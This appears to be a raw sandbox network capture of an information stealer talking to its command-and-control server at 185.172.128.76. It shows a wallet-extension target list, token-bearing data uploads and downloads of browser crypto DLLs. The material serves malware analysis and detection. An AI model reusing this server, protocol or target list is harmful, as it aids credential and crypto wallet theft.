Apr 27, 2024 02:19:03.853064060 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 27, 2024 02:19:03.853147030 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 27, 2024 02:19:03.853303909 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 27, 2024 02:19:05.498318911 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA Host: 185.172.128.76 Content-Length: 6179 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:19:05.498320103 CEST	6179	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 27, 2024 02:19:06.272545099 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:19:06.275603056 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:19:06.554441929 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:06 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 27, 2024 02:19:06.554462910 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 27, 2024 02:19:06.554594994 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 27, 2024 02:19:06.554615021 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 27, 2024 02:19:06.554635048 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 27, 2024 02:19:27.065717936 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:19:27.377088070 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:19:27.459513903 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:19:27.767474890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:19:27.839993954 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 [TRUNCATED] Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file"------ECBGIEHDBAAFIDGDAAAA--
Apr 27, 2024 02:19:28.146756887 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:19:28.460273981 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 [TRUNCATED] Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
Apr 27, 2024 02:19:28.759814978 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:19:29.014657021 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:19:29.296333075 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:29 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
Apr 27, 2024 02:19:39.890960932 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:19:40.173234940 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:40 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
Apr 27, 2024 02:19:46.210999012 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:19:46.497673988 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:46 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
Apr 27, 2024 02:19:52.055536032 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:19:52.333519936 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:52 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 27, 2024 02:20:17.765582085 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:20:18.048156023 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:17 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
Apr 27, 2024 02:20:22.400831938 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 27, 2024 02:20:22.687602043 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:22 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
Apr 27, 2024 02:20:25.492712021 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECG Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:25.803239107 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:25.853312016 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 